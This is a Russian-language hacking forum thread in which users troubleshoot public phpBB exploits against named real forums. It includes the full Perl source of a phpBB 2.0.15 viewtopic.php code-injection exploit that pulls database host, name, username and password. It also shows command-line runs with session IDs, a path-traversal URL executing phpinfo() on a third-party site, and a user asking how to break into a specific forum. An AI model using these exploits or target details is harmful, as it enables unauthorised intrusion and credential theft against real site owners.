• XSS.stack #1 – первый литературный журнал от юзеров форума

Ошибка..

Tycoon

RAM
Пользователь
Регистрация
31.12.2004
Сообщения
106
Реакции
0
Пожалуйста, обратите внимание, что пользователь заблокирован
Когда я запускаю сплоит б** форумов phpBB..

Пример:

C:\>phpbbexp.exe http://www.forum.ravens.ru/ bla bla
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... 0c89d701c3ea9462841779c1bcf055bc
http://www.forum.ravens.ru/?sid=0c89d701c3...41779c1bcf055bc
_ recuperation du nom de la table sql ... can't find
и какой бы я форум не пробовал всёгда кончается одинакого..can't find..

Скажи почему так?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
©yBe®0Ge№
У тебя таких партаков нету как у меня?
Дай 1 форум если не сложно,такой что бы у меня работал )
 
Пожалуйста, обратите внимание, что пользователь заблокирован
©yBe®0Ge№
Ты сам лам,похоже ты и туп ещё,я не один форум пробовал и после десятков форумов мне это надоело и спросил почему так получается у меня..
 
Tycoon, че я могу сказать, тупым ламом вышел ты :lol2: :lol2: ты даже незнаешь как этот сплойт работает :) хотябы почитал че сплойт пишет, а то тока "кант финд" :lol: :lol: Сплойт ищет через багу в admin_styles.php доступ к mysql и делает туда иньекцию. вот тебе http://kartuning.ru/phpBB2/ :) он рабочий :)

C:\>bbsh.exe http://kartuning.ru/phpBB2/ lol lol
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuperщ ... 984afb6d45fb3aa522fc662c606c3e5b
http://kartuning.ru/phpBB2/?sid=984afb6d45...2fc662c606c3e5b
_ recuperation du nom de la table sql ... phpbb_ OK
_ Injection de la fake templates ...OK
_ Fichier crщe
_ Code executщ
http://kartuning.ru/phpBB2/admin/admin_sty...stall_to=../../.
./../../../../../../../../../../../../../../../../tmp&nigga=phpinfo();&sid=984af
b6d45fb3aa522fc662c606c3e5b

Чтобы зайти в админку нужно сделать строку такого типа
http://kartuning.ru/phpBB2/admin/index?;&s...2fc662c606c3e5b

Tycoon если же у тебя получиться зайти в админку :))) то попробуй изменить путь к mysql и занова заюзай сплойт, он перестанет работать :) это типа лабораторного опыта :)) может тебе видео снять ? :)
 
Cам код на перле
Код:
#!/usr/bin/perl

# tested and working /str0ke

#        ********************************************************************
#       **********************************************************************
#      ****                                                                 **
#     ***      ******       *******************                             **
#    ***    ***   ****   ***********************                            **
#   ***   ***     ****                       ****      *   ***    *****     **
#  ***   ***      ***                ***     ***      *  **  **   **        **
# ***   ***                         ***      **         **   **  **         **
#***   ***                          ***    ***          **   **  *****      **
#**   ***                          ***  ****           **   **      **      **
#**   ***       ***  ***   ******* *******             **  ***      **      **
#**   ***      ***   ***  **      *** ***              **  **  **  **       **
#**  ***      ***   ***  **      ***  ***               ***   *****         **
#**   ***     ***   *** **       ***  ***                                   **
#**   ****   ***    ****        ***   ***                                   **
#**     *******    ****   ********     ***********************************  **
#**         ***                                                             **
#**        ***                                                              **
#**                                                                         **
#**      phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability     **
#**      This exploit gives the user all the details about the database     **
#**      connection such as database host, username, password and           **
#**      database name.                                                     **
#**                                                                         **
#**              Written by SecureD,  gvr.secured<AT>gmail<DOT>com,2005     **
#**                                                                         **
#**      Greetings to GvR, Jumento, PP, CKrew & friends                **
#**                                                                         **
#***************************************************************************** 
# ***************************************************************************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "|           PhpBB 2.0.15 Database Authentication Details Exploit        |\r\n";
print "|                 By SecureD gvr.secured<AT>gmail<DOT>com               |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER         - Server where PhpBB is installed.\r\n";
print "DIR            - PHPBB directory or / for no directory.\r\n";
print "THREADID       - Id of an existing thread.\r\n";
print "COOKIESTRING   - Optional, cookie string of the http request.\r\n";
print "                 Use this when a thread needs authentication for viewing\r\n";
print "                 You can use Firefox in combination with \"Live HTTP\r\n";
print "                 Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}

$serv  	= $ARGV[0];
$dir  	= $ARGV[1];
$threadid  = $ARGV[2];
$cookie  = $ARGV[3];

$serv  	=~ s/http:\/\///ge;
$delimit  = "GvRSecureD";

$sploit  = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting      OK\n";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
	print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";


$succes = 0;

while ($answer = <$sock>) {
	$delimitIndex = index $answer, $delimit;
	if ($delimitIndex >= 0) {
  $succes = 1;
  $urlIndex = index $answer, "href";
  if ($urlIndex < 0){
  	$answer = substr($answer, length($delimit));
  	$length = 0;
  	while (length($answer) > 0) {
    $nex = index($answer, $delimit);
    if ($nex > 0) {
    	push(@array, substr($answer, 0, $nex));
    	$answer = substr($answer, $nex + length($delimit), length($answer));
    } else {
    	$answer= "";
    }
  	}
  }
	}
}

close($sock);

if ($succes == 1) {
	print "OK\n";
	sleep(1);
	print "[+] Database Host:  " . $array[0] . "\n";
	sleep(1);
	print "[+] Database Name:  " . $array[1] . "\n";
	sleep(1);
	print "[+] Username:       " . $array[2] . "\n";
	sleep(1);
	print "[+] Password:       " . $array[3] . "\n";
	sleep(1);
} else {
	print "FAILED\n";
}

# milw0rm.com [2005-07-03]
ввожу в команд строке bb8.pl http://netforum.e7e.info // 27
выскакивает
[ + ] Connecting OK
[ + ] Sending exploit OK
[ + ] Database Host:
[ + ] Database Name:
[ + ] Username:
[ + ] Password:

все особо нужные поля пустые :), в чем может быть трабл? по идеи если сплоит не работал бы, то в Sending exploit OK, не стояло бы ок
тема 27 существет..
Вообще посоветуйте чем можно этот форум ломануть, точнее подскажите, а я сам попробую. Из всего что есть на вашем форуме у меня получилось там только пофлудить ), слишком безобидно сами понимаете
 
1. Версия форума = 2.0.15? Этот сплоит только для нее предназначен
2. Sending exploit OK еще не значит, что эксплоит сработал. Это лишь значит, что сервер не находится в оффлайне, что запрос был послан и сервер вернул результат.
3. Какой именно форум?
 
или другой сплойт
\bb>r57phpbba2e2.pl -u netforum.e7e.info -L ss -P 233223 -i 2 -p //
\=-----------------------------------=/
| phpBB admin2exec exploit by RST/GHC |
| version 2 (user_sig_bbcode_uid) |
/=-----------------------------------=\
Command for execute or 'exit' for exit # ls -l
Command for execute or 'exit' for exit #

и тоже ничего не выполняется, или я че то не так делаю?
 
версия форума (вероятнее всего) - 2.0.19
На паблике для нее только сплоит от RST, который пытаешься заюзать ты, причем даже не прочитав исходный код сплоита и не учитывая его особенностей.
 
Хм..
bb>r57phpbba2e2.pl -u http://netforum.e7e.info/ -L admin -P password

\=-----------------------------------=/
| phpBB admin2exec exploit by RST/GHC |
| version 2 (user_sig_bbcode_uid) |
/=-----------------------------------=\
Command for execute or 'exit' for exit # id
Command for execute or 'exit' for exit #

Че то не так делаю?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх